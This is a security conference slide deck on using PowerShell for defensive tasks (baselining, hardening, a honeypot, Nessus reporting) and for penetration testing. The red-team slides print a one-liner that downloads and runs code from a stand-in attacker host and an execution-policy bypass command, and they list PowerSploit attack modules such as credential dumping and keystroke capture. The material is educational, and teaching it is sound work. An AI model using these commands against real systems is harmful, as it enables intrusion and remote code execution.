Who should use Powershell?
You should use Powershell!
Ben Finke
@benfinke
A bit about me…
Ben Finke
@benfinke (if you’re in to that sort of thing)
▪ Security team at EI
▪ Love continuous learning
Red Teamer / Blue Teamer
What brought me to Powershell
Standing on the Shoulders…
▪ Carlos Perez
▪ Matt Graeber
▪ Chris Campbell
▪ Matt Johnson
▪ Don Jones
▪ Lee Holmes
▪ Wolfgang Goerlich
▪ Rich Cassara
▪ Nick Jacob
▪ Ben Ten
▪ Ed Wilson
▪ Adam Driscoll
▪ And many, many more…..
I’m NOT saying…
Only use Powershell!!
I’m NOT saying…
My way or the highway
I AM saying…
Use Windows?
Powershell is great.
I AM saying…
New to scripting?
Powershell is great
I AM saying…
Pick the right tool for the right job.
Powershell – The Beginning
▪ Built into Windows!
▪ Better than Batch and cmd.exe
▪ Objects > Manipulating text output
▪ Powershell Remoting
▪ Did I mention it's built into Windows?!
▪ Great documentation, code samples, communities
▪ Best tool for scripting and automating Windows
Levelset
▪ Cmdlet (pronounced like it sounds)
▪ Functions
▪ Scripts
▪ Modules
▪ Object
▪ Method vs Property
▪ Variable
Cmdlet
▪ Not misspelled – a feature!
▪ Powershell commands – implement specific functionality
▪ Verb-Noun pattern
▪ Microsoft and Third-Party cmdlets available
▪ Written in .Net (like C#)
▪ Get-Command
▪ Get-Help
So, where do I write my awesome code?
▪ Powershell ISE
▪ Notepad++
▪ Sublime Text Editor 2
▪ Primal Script ($)
▪ Visual Studio ($ or Community)
▪ You’re totally going to need a Windows computer though…
Powershell ISE
▪ Integrated Scripting Environment
▪ Tab Expansion
▪ Module Search
▪ Context based Help
▪ Demo!
Blue Team – Builder and Defender
Discovery
Baseline
System Hardening
Incident Response
Show Command Logging
Powershell Remoting
▪ Run that Powershell script on a remote Windows system!
▪ Uses WinRM
Powershell Remoting – A word of caution
▪ Windows 2012 and newer – default w/ HTTP listener
▪ All others need to be configured (once WMF is installed)
▪ Kerberos in AD, Basic and NTLM for workgroups
▪ Use HTTPS when available! (need a Windows CA)
▪ CredSSP is an option (especially if you like PtH Attacks)
– That was a joke, you don’t.
▪ CredSSP for delegation and multi-hops
Discovery
Discovery
Baseline
System Hardening
Incident Response
Powershell Discovery
▪ Incorporate useful information from other tools
– Nmap
– Nessus
▪ Pull info from AD directly
– Windows 2008 R2 – 76 cmdlets in AD PS Module
– Windows 2012 – 135 cmdlets
– Windows 2012 R2 – 147 cmdlets
▪ Roll your own scanner with Powershell!
Baseline your stuff…
Discovery
Baseline
System Hardening
Incident Response
Baseline – Discovery, done repeatedly
▪ A lot of your discovery tasks will end up in your baseline
▪ Script up what you want to know
▪ Put it into some kind of usable text format
▪ Stash it in a versioning repository
▪ What changed between yesterday and today?
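The baseline loop described above, as an added example that is not part of the talk: snapshot a few things worth knowing about a host, store the snapshot as JSON in a Git-tracked folder, and diff it against the previous run. It assumes Windows 8/2012 or newer cmdlets, Git on the PATH, and that $BaselineDir is already a Git repository.

```powershell
# Added example: daily host baseline with a diff against yesterday's snapshot.
param(
    [string]$BaselineDir = "C:\Baselines",   # assumed: an existing Git repo
    [string]$HostName = $env:COMPUTERNAME
)

function Get-HostSnapshot {
    # Every section is sorted so two snapshots of an unchanged host compare equal.
    [pscustomobject]@{
        Services       = Get-Service | Where-Object Status -eq 'Running' |
                         Sort-Object Name | Select-Object -ExpandProperty Name
        LocalAdmins    = Get-LocalGroupMember -Group 'Administrators' |
                         Sort-Object Name | Select-Object -ExpandProperty Name
        Listeners      = Get-NetTCPConnection -State Listen |
                         Sort-Object LocalPort |
                         ForEach-Object { "$($_.LocalAddress):$($_.LocalPort)" } |
                         Select-Object -Unique
        ScheduledTasks = Get-ScheduledTask | Where-Object State -ne 'Disabled' |
                         Sort-Object TaskName | Select-Object -ExpandProperty TaskName
    }
}

function Compare-Snapshot {
    param($Old, $New)
    foreach ($section in $New.PSObject.Properties.Name) {
        # SideIndicator '=>' = present today only, '<=' = present yesterday only.
        Compare-Object -ReferenceObject @($Old.$section) -DifferenceObject @($New.$section) |
            ForEach-Object {
                [pscustomobject]@{ Section = $section; Item = $_.InputObject; Change = $_.SideIndicator }
            }
    }
}

$today = Get-HostSnapshot
$file  = Join-Path $BaselineDir "$HostName.json"

if (Test-Path $file) {
    # "What changed between yesterday and today?"
    $yesterday = Get-Content -Raw $file | ConvertFrom-Json
    Compare-Snapshot -Old $yesterday -New $today | Format-Table -AutoSize
}

# Overwrite the snapshot; Git keeps the history.
$today | ConvertTo-Json -Depth 3 | Set-Content -Path $file
git -C $BaselineDir add $file
git -C $BaselineDir commit -q -m "baseline $HostName $(Get-Date -Format s)"
```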
Automate Reporting
▪ Need to nicely present Nessus or nmap output?
▪ Previous work
– Carlos Perez (DarkOperator) – Posh-NVS
▪ https://github.com/darkoperator/Posh-NVS
▪ Powershell easily handles XML and CSV inputs
[xml]$report = Get-Content -Raw .\scan.nessus
$reporthosts = $report.NessusClientData_v2.Report.ReportHost
$reporthosts | foreach {$_.ReportItem} | Out-GridView
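Going one step further than the three lines above, as an added example that is not part of the talk or of Posh-NVS: flatten a .nessus (NessusClientData_v2) export into one row per host and finding with a readable severity, print a count by severity, and write the detail to CSV. The input and output paths are assumptions.

```powershell
# Added example: flatten a Nessus XML report into objects, then CSV.
param([string]$Path = ".\scan.nessus")   # assumed input path

# Nessus stores severity as 0-4 on each ReportItem.
$severityName = @{ '0' = 'Info'; '1' = 'Low'; '2' = 'Medium'; '3' = 'High'; '4' = 'Critical' }

function ConvertFrom-NessusReport {
    param([string]$NessusFile)
    [xml]$report = Get-Content -Raw $NessusFile
    foreach ($reportHost in $report.NessusClientData_v2.Report.ReportHost) {
        # host-ip lives in HostProperties/tag[@name='host-ip']
        $ip = ($reportHost.HostProperties.tag | Where-Object name -eq 'host-ip').'#text'
        foreach ($item in $reportHost.ReportItem) {
            [pscustomobject]@{
                Host     = $reportHost.name
                IP       = $ip
                Port     = "$($item.protocol)/$($item.port)"
                PluginID = $item.pluginID
                Severity = $severityName[[string]$item.severity]
                Finding  = $item.pluginName
                CVE      = ($item.cve -join ', ')   # zero, one or many <cve> children
            }
        }
    }
}

$findings = ConvertFrom-NessusReport -NessusFile $Path

# Quick summary for the report...
$findings | Group-Object Severity | Sort-Object Count -Descending |
    Select-Object Name, Count | Format-Table -AutoSize

# ...and the full detail (minus informational plugins) for the spreadsheet crowd.
$findings | Where-Object Severity -ne 'Info' |
    Sort-Object Severity, Host |
    Export-Csv -NoTypeInformation -Path .\scan-findings.csv
```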
Script out your ideal config…
Discovery
Baseline
System Hardening
Incident Response
System Hardening
▪ Use Powershell to
– Enable Windows Firewall
– Enable Windows Update
– Disable Guest account
– Disable autoplay
– Install AV software
– Turn on User Account Control
– Disable Java in IE
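Several of the items above scripted out, as an added example that is not part of the talk: firewall, Windows Update, the Guest account, autoplay and UAC, with a before/after table so the run can be reviewed. It assumes Windows 8/2012 or newer (NetSecurity and LocalAccounts modules) and an elevated session; the AV install and the Java-in-IE item are not covered.

```powershell
# Added example: apply part of an "ideal config" and report each change.
#Requires -RunAsAdministrator

function Set-RegistryValue {
    param([string]$Path, [string]$Name, [int]$Value)
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    $before = (Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue).$Name
    Set-ItemProperty -Path $Path -Name $Name -Value $Value -Type DWord
    [pscustomobject]@{ Setting = "$Path\$Name"; Before = $before; After = $Value }
}

$results = @()

# Windows Firewall on for every profile.
$fwBefore = @{}
Get-NetFirewallProfile | ForEach-Object { $fwBefore[$_.Name] = $_.Enabled }
Set-NetFirewallProfile -Profile Domain,Private,Public -Enabled True
$results += Get-NetFirewallProfile | ForEach-Object {
    [pscustomobject]@{ Setting = "Firewall\$($_.Name)"; Before = $fwBefore[$_.Name]; After = $_.Enabled }
}

# Guest account disabled.
$guest = Get-LocalUser -Name 'Guest' -ErrorAction SilentlyContinue
if ($guest) {
    Disable-LocalUser -Name 'Guest'
    $results += [pscustomobject]@{ Setting = 'LocalUser\Guest'; Before = $guest.Enabled; After = $false }
}

# Autoplay off for all drive types (NoDriveTypeAutoRun = 0xFF).
$results += Set-RegistryValue 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer' 'NoDriveTypeAutoRun' 255

# User Account Control on.
$results += Set-RegistryValue 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' 'EnableLUA' 1

# Windows Update policy: 4 = auto download and schedule the install.
$results += Set-RegistryValue 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU' 'AUOptions' 4

$results | Format-Table -AutoSize
```

A change to EnableLUA only takes effect after a reboot.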
What to do when weird things happen…
Discovery
Baseline
System Hardening
Incident Response
Incident Response
▪ Something bad (or maybe bad) is happening
▪ Identify source of unwanted activity
▪ Determine what is occurring
▪ Isolate and Contain
▪ Gather information from isolated system(s)
▪ After Action review
Build Your Own HoneyPot!
▪ Create cmdlet parameter binding
▪ Make sure you’re admin
▪ Build your whitelist
▪ Create a listening port
▪ Any connection – add source IP to firewall
▪ Log the action (for reporting and response)
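The six steps above in code, as an added example that is not part of the talk: a TCP "honeyport" that serves nothing, blocks any non-whitelisted source that connects and logs the event. It assumes Windows 8/2012 or newer (NetSecurity module) and an elevated session; the port, whitelist and log path are assumptions.

```powershell
# Added example: honeyport that blocks and logs any unexpected connection.
function Start-HoneyPort {
    [CmdletBinding()]                                   # cmdlet parameter binding
    param(
        [Parameter(Mandatory)][ValidateRange(1, 65535)][int]$Port,
        [string[]]$Whitelist = @('127.0.0.1'),          # sources that are never blocked
        [string]$LogPath = "$env:ProgramData\honeyport.log"
    )

    # Make sure we're admin: New-NetFirewallRule needs it.
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    if (-not $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
        throw 'Start-HoneyPort must run from an elevated session.'
    }

    $listener = New-Object Net.Sockets.TcpListener([Net.IPAddress]::Any, $Port)
    $listener.Start()
    Write-Verbose "Listening on TCP/$Port; whitelist: $($Whitelist -join ', ')"
    try {
        while ($true) {
            $client = $listener.AcceptTcpClient()
            $source = $client.Client.RemoteEndPoint.Address.ToString()
            $client.Close()   # nothing is served; the connection itself is the signal

            if ($Whitelist -contains $source) {
                Write-Verbose "Ignoring whitelisted $source"
                continue
            }

            # Any other connection: one inbound block rule per source address.
            $ruleName = "HoneyPort block $source"
            if (-not (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)) {
                New-NetFirewallRule -DisplayName $ruleName -Direction Inbound `
                    -RemoteAddress $source -Action Block -Profile Any | Out-Null
            }

            # Timestamped log line for reporting and response.
            "$(Get-Date -Format o) BLOCK src=$source port=$Port" | Add-Content -Path $LogPath
            Write-Warning "Blocked $source after connection to TCP/$Port"
        }
    }
    finally {
        $listener.Stop()
    }
}

Start-HoneyPort -Port 2222 -Whitelist '127.0.0.1', '10.0.0.5' -Verbose
```

Pick a port nothing legitimate uses and put your scanners and monitoring hosts in the whitelist, or the first vulnerability scan will block them.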
PoshSec
▪ A Powershell module designed for executing security tasks on
Windows systems
▪ Started by Will Steele and Matt Johnson
▪ Github – PoshSec
▪ BlueTeam Focused
▪ Provides the platform for scripting and automating your playbook
PoshSec Framework
▪ A framework for Powershell and PoshSec scripts for network
management, security, and maintenance
▪ Graphical Framework
PoshSec
▪ Critical Security Controls
– (1) Inventory of Authorized and Unauthorized Devices
– (2) Inventory of Authorized and Unauthorized Software
– (11) Limitation and Control of Network Ports, Protocols, and Services
– (12) Controlled Use of Admin Privileges
– (16) Account Monitoring and Control
▪ Baselines
▪ Forensics
▪ Log Management
▪ Software Management
A few helpful hints
▪ Get a code repo – SVN/Git/TFS/whatever
▪ Centralized logging
▪ Prepare BEFORE the Incident
▪ Test your defenses
▪ Test your response
Red Team – Destroyer of Dreams
Attacker’s Advantage
“Attack him where he is unprepared,
appear where you are not expected.”
-Sun Tzu
*Obligatory Art of War quote
So you’re on this pentest…
▪ You totally exploit that one thing.
▪ And then AV stops every. Single. Thing. You. Try.
▪ Time to Live off the Land!**
** Living off the Land – By Chris Campbell and Matt Graeber
Powershell as a Post Exploitation Tool
▪ Remember what we said about already on the system?
▪ Bypass AV and application whitelisting
▪ Control all aspects of a Windows system
▪ Easy to execute:
Invoke-Expression (New-Object
Net.WebClient).DownloadString("http://evilsite.com/code.txt")
PowerSploit
▪ Github project - https://github.com/mattifestation/PowerSploit
▪ Started by Matt Graeber (@mattifestation)
▪ Powershell modules for pentesters
▪ Loads of PS goodness like:
• Invoke-Shellcode
• Find-AVSignature
• Invoke-TokenManipulation
• Invoke-Mimikatz
• Get-Keystrokes
• Get-TimedScreenshot
• Set-MasterBootRecord
• Set-CriticalProcess (BSoD)
• Invoke-Portscan
• Invoke-ReverseDnsLookup
• Get-PEHeader
• Get-DLLLoadPath
• And lots, lots more!
“But wait!” you say…
Won’t the Execution Policy prevent our PS from running?
Not so much…
Powershell.exe -ExecutionPolicy Bypass evilscript.ps1
Seriously Bro, Powershell on a pentest?
▪ Yes, I am quite serious (and don’t call me Bro…)
▪ Ever hear of Deep Panda?
– ProTip: Do NOT search for “Deep Panda” on Google Images.
▪ Deep Panda – the APT, not the 80s Metal Band
▪ Maintained persistence with Powershell scripts as scheduled tasks
▪ Moral of the story: Good enough for Deep Panda, good enough for you!
Whatever you are writing, please
remember…
▪ Your code will be written once – and read dozens more.
▪ “accountName” is a way better variable than “a”
▪ Comments – use them!
▪ Think modular (or reusable)
▪ Error Catching
▪ Logging
▪ Documentation of your functions
▪ Code Repository
That’s it for me, you’ve been great!
If you enjoyed the talk, my name is Ben Finke.
If not, I’m Jess Hires (@hacksonville).
Thank you!